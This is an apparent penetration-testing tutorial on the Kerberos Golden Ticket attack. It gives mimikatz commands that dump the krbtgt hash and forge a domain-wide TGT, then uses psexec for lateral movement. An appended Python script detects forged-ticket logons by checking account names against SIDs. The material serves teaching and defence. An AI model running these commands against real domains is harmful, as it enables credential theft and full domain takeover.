Golden Ticket

In one of the previous methods we found a way to get the password of an SPN account and use it to create a TGS to gain access to the resources available to that SPN. This is great, but what if we can make TGTs ourselves? Then we can grant ourselves unrestricted access across the entire domain.

The TGT is issued by the domain controller and is protected with the password (key) of a domain user account called krbtgt. If we can get the password hash of this account, then we can use it to create any TGT that we want.

In order to achieve this we need one of two things: access to an account that is a member of the "Domain Admins" group, or a compromised domain controller.

We will use mimikatz to create the Golden Ticket using the following commands:

privilege::debug
lsadump::lsa /patch

If you have the right access or have compromised the domain controller, you should see the krbtgt account listed. We can use the hash of that account in the command below to create the Golden Ticket:

kerberos::golden /user:userx /domain:p42.com /sid:S-1-5-21-1602875587-2794529311-2849289388 /krbtgt:75b60230423924812011dbfaf3413565 /ptt
misc::cmd

Next we can use the psexec command to move laterally to any machine within the domain:

psexec.exe \\particle01 cmd.exe
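Because the forged ticket carries whatever username and SID the attacker chose (here userx combined with the domain SID), the logon events it produces on a target such as particle01 can show an account name that does not exist in the directory, or one that disagrees with the SID in the ticket. The following is an added detection example, not part of the original page or of mimikatz; the directory snapshot and the flattened 4624-style log records are constructed for the demonstration, and the account names other than userx are made up.

```python
import re
from typing import Dict, List

# Constructed directory snapshot: the domain SID from the page, plus a
# RID -> sAMAccountName map (the account names themselves are made up).
DOMAIN_SID = "S-1-5-21-1602875587-2794529311-2849289388"
RID_TO_NAME: Dict[int, str] = {500: "administrator", 1104: "alice", 1105: "svc_sql"}

# Constructed logon records in a flattened "key=value;" form, modelled loosely
# on the fields of a Windows 4624 event; a real collector supplies its own format.
SAMPLE_EVENTS = [
    "EventID=4624;Computer=particle01;SecurityID=S-1-5-21-1602875587-2794529311-2849289388-1104;AccountName=alice;LogonType=3",
    "EventID=4624;Computer=particle01;SecurityID=S-1-5-21-1602875587-2794529311-2849289388-500;AccountName=userx;LogonType=3",
    "EventID=4624;Computer=particle02;SecurityID=S-1-5-21-1602875587-2794529311-2849289388-500;AccountName=Administrator;LogonType=3",
    "EventID=4624;Computer=particle02;SecurityID=S-1-5-21-1602875587-2794529311-2849289388-9999;AccountName=ghost;LogonType=3",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split a 'key=value;' record into a dict (values are kept verbatim)."""
    return dict(kv.split("=", 1) for kv in line.strip(";").split(";"))

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons a logon looks forged; an empty list means consistent."""
    findings: List[str] = []
    if ev.get("EventID") != "4624":
        return findings
    sid = ev.get("SecurityID", "")
    name = ev.get("AccountName", "").lower()
    m = re.fullmatch(rf"{re.escape(DOMAIN_SID)}-(\d+)", sid)
    if not m:
        return [f"SID {sid} is not from this domain"]
    rid = int(m.group(1))
    expected = RID_TO_NAME.get(rid)
    if expected is None:
        findings.append(f"RID {rid} has no account in the directory")
    elif expected != name:
        findings.append(f"name {name!r} does not match RID {rid} ({expected!r})")
    if name not in RID_TO_NAME.values():
        findings.append(f"account name {name!r} does not exist in the directory")
    return findings

def scan(lines) -> Dict[str, List[str]]:
    """Map 'Computer/AccountName' of each suspicious logon to its findings."""
    alerts: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        reasons = check_event(ev)
        if reasons:
            alerts[f"{ev.get('Computer', '?')}/{ev.get('AccountName', '?')}"] = reasons
    return alerts

if __name__ == "__main__":
    for key, reasons in scan(SAMPLE_EVENTS).items():
        print(key, "->", "; ".join(reasons))
```

On the constructed input only the userx logon on particle01 (name/SID disagreement plus unknown name) and the ghost logon on particle02 (unknown RID and name) are flagged; the genuine alice and Administrator logons pass.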